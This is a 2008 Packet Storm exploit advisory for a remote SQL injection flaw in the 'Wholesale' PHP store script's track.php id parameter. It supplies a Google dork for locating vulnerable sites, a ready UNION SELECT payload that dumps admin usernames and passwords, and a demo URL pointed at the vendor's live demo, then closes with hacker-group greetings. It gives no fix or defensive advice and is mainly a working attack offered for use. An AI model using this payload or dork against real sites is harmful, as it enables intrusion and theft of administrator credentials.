wholesale-sql.txt

2008-11-17T00:00:00
ID PACKETSTORM:72003
Type packetstorm
Reporter Hussin X
Modified 2008-11-17T00:00:00

Description

                                        
                                            `|___________________________________________________  
|  
| Wholesale ( track.php id) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|  
|  
| Author: Hussin X  
|  
| Home : WwW.IQ-ty.CoM  
|  
| email: darkangel_g85@Yahoo.com  
|  
|___________________________________________________  
|  
| script : http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162  
|  
| DorK : inurl:"track.php?id="  
|___________________________________________________  
  
Exploit:  
________  
  
  
  
www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--  
  
  
  
Demo  
________  
  
http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--  
  
  
  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |  
|  
| My friends : DeViL iRaQ | IRAQ_JAGUR | Cyber-Zone | Sakab  
|  
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | CraCkEr | G4N0K  
|_____________________________________________________________________  
  
  
Im IRAQi | Im TrYaGi  
  
  
`